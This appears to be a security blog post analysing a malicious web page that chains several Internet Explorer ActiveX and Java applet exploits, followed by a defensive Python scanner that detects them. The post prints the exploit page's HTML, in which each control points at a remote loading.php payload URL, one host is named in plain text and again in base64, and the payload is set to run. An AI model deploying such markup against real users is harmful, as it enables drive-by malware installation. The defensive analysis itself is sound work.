ActiveX is a proprietary Microsoft technology that lets developers build reusable software components. The controls are compatible with the Internet Explorer (IE) web browser and over the years have been a frequent security threat, as many developers have produced insecure ActiveX controls that can lead to remote code execution when a user running IE visits a malicious web page. This is a very powerful tool for attackers because everything happens in the background (no user interaction), and they can trigger exploitation with only a few lines of code.
I recently stumbled upon a page using no fewer than 8 different ActiveX exploits on the same page:
<html><body><object
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="hxxp://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:BBBBBBBB-BBBB-BBBBB-BBBB-BBBBBBBBBBBB">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA5">
<PARAM NAME="OpenWebFile"
VALUE="http://ally.serveblog.net//loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="installAppMgr"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="PerformUpdateAsync"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="ExecutePreferredApplication"
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="http://xxx/DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressbackground" VALUE="#bccee8">
<PARAM NAME="propTextbackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl"
VALUE="http://xxx/loading.php?spl=ActiveX_pack">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propbrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0"> </OBJECT>
<OBJECT id="sysWIN" WIDTH=1 HEIGHT=1
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA"
codebase="http://xxx/Bol.CAB"></OBJECT>
<script language="vbscript">
sysWIN.url = "http://xxx/loading.php?spl=ActiveX_pack"
sysWIN.fontsize = 10
sysWIN.barcolor = 00FF00
sysWIN.start = "start"</script>
<applet code="sklif.Hieeyfc.class" archive="j1_ke.jar" width="480"
height="200">
<param name="data" VALUE="http://xxx/loading.php?spl=javadnwa&">
<param name="cc" value="1"> </applet>
<applet width="100%" height="100%" code="Uutecwv" archive="j2_93.jar">
<param name="site"
VALUE="aHR0cDovL2FsbHkuc2VydmVibG9nLm5ldC8vbG9hZGluZy5waHA/c3BsPWphdmFkbndiJg==">
</applet>
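As an added defender-side example (not code from the original post or from the exploit page above), here is a small Python scanner that pulls every object/applet out of a captured HTML page, flags the download-and-run parameter names seen above (OpenWebFile, installAppMgr, PerformUpdateAsync, ExecutePreferredApplication, propDownloadUrl), counts distinct CLSIDs, and decodes applet parameters hidden in base64 as in the last applet; the CLSIDs and host in the embedded sample are constructed placeholders.

```python
import base64
import re
from html.parser import HTMLParser

# Param names the captured page used to pass a payload URL (parser lowercases names).
RISKY_PARAMS = {"openwebfile", "installappmgr", "performupdateasync",
                "executepreferredapplication", "propdownloadurl"}

class ControlCollector(HTMLParser):
    """Collects each <object>/<applet> with its classid and nested <param>s."""
    def __init__(self):
        super().__init__()
        self.controls, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("object", "applet"):
            self._cur = {"tag": tag, "classid": a.get("classid", "").lower(), "params": {}}
            self.controls.append(self._cur)
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "").lower()] = a.get("value", "")

def scan(html):
    """Summarise download-and-run indicators: risky params, payload URLs, base64 URLs."""
    c = ControlCollector()
    c.feed(html)
    risky, urls, decoded = [], set(), []
    for ctl in c.controls:
        for name, value in ctl["params"].items():
            if name in RISKY_PARAMS:
                risky.append((ctl["classid"] or ctl["tag"], name))
                urls.add(value)
            if re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", value):  # base64-hidden URL
                try:
                    text = base64.b64decode(value, validate=True).decode("ascii")
                except (ValueError, UnicodeDecodeError):
                    continue
                if text.startswith("http"):
                    decoded.append(text)
    return {"controls": len(c.controls),
            "distinct_clsids": len({x["classid"] for x in c.controls if x["classid"]}),
            "risky_params": risky, "payload_urls": sorted(urls), "decoded_b64": decoded}

# Constructed sample modelled on the captured page; CLSIDs and host are placeholders.
SAMPLE = """<object classid="clsid:00000000-0000-0000-0000-000000000001">
<PARAM NAME="OpenWebFile" VALUE="http://example.invalid/loading.php?spl=pack"></object>
<OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000000000002">
<PARAM NAME="propDownloadUrl" VALUE="http://example.invalid/loading.php?spl=pack">
<PARAM NAME="propPostdownloadAction" VALUE="run"></OBJECT>
<applet code="Loader" archive="j.jar"><param name="site" value="aHR0cDovL2V4YW1wbGUuaW52YWxpZC94"></applet>"""
```

The VBScript assignment to sysWIN.url in the sample above is not a param and so is not caught by this parser; a page with several distinct CLSIDs all fed the same payload URL is the pattern worth alerting on.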